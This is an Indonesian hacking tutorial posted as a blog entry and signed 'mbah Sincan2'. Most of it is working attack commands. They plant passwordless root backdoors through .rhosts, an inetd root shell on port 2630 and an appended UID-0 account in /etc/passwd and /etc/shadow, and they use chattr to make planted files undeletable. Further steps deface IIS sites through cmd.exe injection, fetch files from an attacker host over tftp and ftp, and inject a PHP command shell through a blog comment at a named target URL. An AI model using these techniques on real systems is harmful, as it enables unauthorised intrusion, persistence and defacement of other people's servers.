1.Caranya bikin shell tanpa password :
root# echo "korban.com Sincan2" >> /.rhosts
rlogin -l root, korban.com
2.Mengedit shell Tanpa password "
gdm:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
* << tanda itu di hapus Shell dengan login gdm akan tanpa password
3.Shell tanpa password :
root@Sincan2# echo "ntcp 2630/tcp # Network Traffic Control Protocol" >> /etc/services
root@Sincan2# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/Sincan2" >> /etc/inetd.conf
root@Sincan2# echo "echo korban.com > ~root/.rhosts" > /tmp/Sincan2
root@Sincan2#echo Sincan2:x:0:0:Sincan2:/:/bin/sh >> /etc/passwd;
root@Sincan2#echo Sincan2:::::: >> /etc/shadow;
root@Sincan2#passwd Sincan2
Skript 3 diatas akan :
A.membuka saluran telnet Port 2630
B.Membuka Folder root telnet,sistem untuk menjalankan perintah /bin/sh sh /tmp/Sincan2
C.Itu membuka >>> telnet korban.com 2630
Setelah itu kalian tinggal tambahkan entri ini root@Sincan2#rlogin -l root korban.com
D.
4.Untuk add User :
/usr/sbin/adduser Sincan2 -g root -d /var/
passwd Sincan2
New password:(isikan password)
Retype password :(isikan sama dengan password tadi)
Lalu kalian coba bukak ssh port 22 Login Sincan2 Password yang kalian setting tadi.
5.Caranya imuttable : << adalah suatu File atau data yang kagak bisa di del meskipun root
bila kamu belum merubah imuttable nya ??????????
chattr +i namafilenya <<< setelan command itu dijalankan kamu cobak rm -rf namafilenya
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
c+copy+c:winntsystem32cmd.exe+c:sincan2.exe
akan menjadi direktory:
/sincan2.exe?/c+dirc:
c+dir+c:inetpub
c+dir+c:inetpubwwwroot
c+dir+c:inetpubindex.htm
jangan merusak index caranya :
c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrootindex.htm.bak << jadikan index.htm jadi .bak
Deface :
c+echo+Deface By Sincan2+>+c:inetpubwwwrootsincan2.htm
Dengan cara Tftp :
c+tftp+-i+202.159.(ipmu)+get+antique.htm(file yang mau di upload)+c:inetpubwwwrootSincan2.html
Script ftp :
c+echo+open+geocities.com+>>+c:inetpubwwwrootsincan2.ftp
c+echo+sincan2+>>c:inetpubwwwrootsincan2.ftp
c+echo+sayangku+>>+c:c+inetpubwwwrootsincan2.ftp
c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootsincan2.ftp
c+echo+ascii+>>+c:inetpubwwwrootsincan2.ftp
c+echo+get+sincan2.htm+>>+c:inetpubwwwrootsincan2.ftp
c+echo+close+>>+c:inetpubwwwrootsincan2.ftp
kita bisa testing :
c+type+c:inetpubwwwrootsincan2.ftp
script selesai :
c+ftp+-s:c:inetpubwwwrootsincan2.ftp
buka ie satu lagi :
c+dir+c:inetpubwwwroot << sudah terkirim belum
--------------------------------------++++++++++++++++++++++++++++--------------
PHP shell
Sincan2 <-= ini bug nya
00000001.php comment <--= ini key googlenya
http://www.mrpscript.net/indra/archives/00000001.php <--= mis. ini targetnya
Name : <---= isi dengan Sincan2
Message : <--= <---= isi terserah dikau
abis toe klik post
http://www.mrpscript.net/indra/archives/00000001.php <-= yg tadinya alamatnya begini
kamu tambahin jadi
http://www.mrpscript.net/indra/archives/00000001.php?cmd=ls
http://www.mrpscript.net/indra/archives/00000001.php?cmd=ls
ls <--= ini adalah command" shell
wget dan lynx berlaku disana
tapi tergantung dari server dibatasi gak command itu diserver target
http://www.gimpster.com/downloads/phpshell/phpshell-1.6.tar.gz <--= nah ini alamat phpshell
kamu ambil aja disana phpshellnya
trus masukin ke server target
biar leluasa
http://stars.allthingx.com/archive/phpshell-1.7/phpshell.php
=====Selesai=====
Never ending story....
Kamis, 19 Februari 2009
by mbah Sincan2
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar